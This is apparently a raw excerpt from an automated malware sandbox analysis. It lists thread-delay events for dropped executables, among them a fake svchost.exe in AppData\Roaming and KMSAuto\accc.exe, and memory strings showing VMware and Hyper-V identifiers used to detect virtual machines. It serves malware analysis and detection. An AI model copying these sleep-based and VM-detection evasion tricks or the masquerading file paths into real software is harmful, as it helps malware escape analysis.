Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560860
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560656
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560282
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560032
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559632
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559419
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559235
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558657
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558266
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557837
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557608
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 557141
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 556094
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555797
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555563
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555364
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 555172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554974
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554789
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 554382
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553953
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553691
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553422
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 553199
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552531
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 552282
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551485
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551281
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 551063
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550858
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550703
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550484
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 550172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 549969
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 549610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 549141
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548906
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548703
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 548266
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 547938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 547735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 547422
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 546906
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 546594
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 546266
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 545969
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 545500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 545188
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 544500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 544198
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 543828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KMSAuto\accc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 599719
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 599265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598255
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597590
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 597170
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596906
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595490
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594633
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 594250
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593875
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593594
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593359
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592797
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592562
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592344
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 592140
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 591797
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 591344
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 591062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590828
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590640
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590406
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 590140
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589922
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589724
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589599
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 589156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588984
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588765
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588578
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588390
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588226
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 588062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587873
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587640
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587422
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 587265
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586890
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586594
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586375
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 586109
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 585781
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 585422
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 585156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 584812
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 584276
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583949
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583728
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583515
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583234
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 583062
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 582812
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 582578
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 582297
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581890
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581703
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581469
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581312
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 581094
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580906
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580716
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580531
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580312
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 580015
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579609
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579437
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579276
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 579078
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578931
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578703
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578538
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578328
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 578125
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577953
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577791
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577500
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577187
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 577015
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576856
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576665
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576515
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576297
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 576015
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575844
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575656
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575523
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 575359
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574969
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574750
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 574181
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 573781
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 573469
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 573219
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572828
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572390
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572203
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 572001
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571797
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571500
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571297
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 571047
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570859
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570713
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570539
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 570156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569982
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569812
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569646
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569429
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 569234
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 568890
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 568422
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 568156
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567687
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567453
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Thread delayed: delay time: 567265

Source: explorer.exe, 00000002.00000002.3165274838.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000018.00000002.3202002014.0000000005876000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Service_{B955B2CC07A01546086603}.exe, 00000036.00000002.2852409138.000001E4C0388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\N
Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233166000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dc9ea4f458eb80<
Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233166000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000000.00000002.1762970728.00000202330DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3162050946.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3148739783.0000021478456000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D7E000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8CB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1788240318.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Service_{B955B2CC07A01546086603}.exe, 00000036.00000002.2852409138.000001E4C0388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yh
Source: svchost.exe, 00000003.00000002.3140975194.0000021472E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2514963704.0000000001192000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C030000.00000004.00000020.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.3034068936.0000000004FB4000.00000004.00000020.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3133485073.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C0CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD0
Source: explorer.exe, 00000002.00000000.1787337320.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000002.00000000.1787337320.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: svchost.exe, 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\>
Source: explorer.exe, 00000002.00000002.3165274838.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C0CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 53A5.tmp.update.exe.2.dr	Binary or memory string: vmware
Source: explorer.exe, 00000002.00000000.1788240318.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: 5E16.tmp.aaa.exe, 00000013.00000002.3134175097.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUA
Source: explorer.exe, 00000002.00000000.1787337320.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C030000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uFOk6EgWWrRKe+c6+Wq31+O7doj9nS7CLPecufdsjt8XwsOV3O2oGPtIRHnl9NCN4vAJ4cQcctbHoaqSCvyy7C/hGFsRJJTd+PU07Y
Source: 4336.tmp.Server.exe, 00000006.00000002.3221091407.00000000052CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{\|\|\|\|{{{{{{\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|
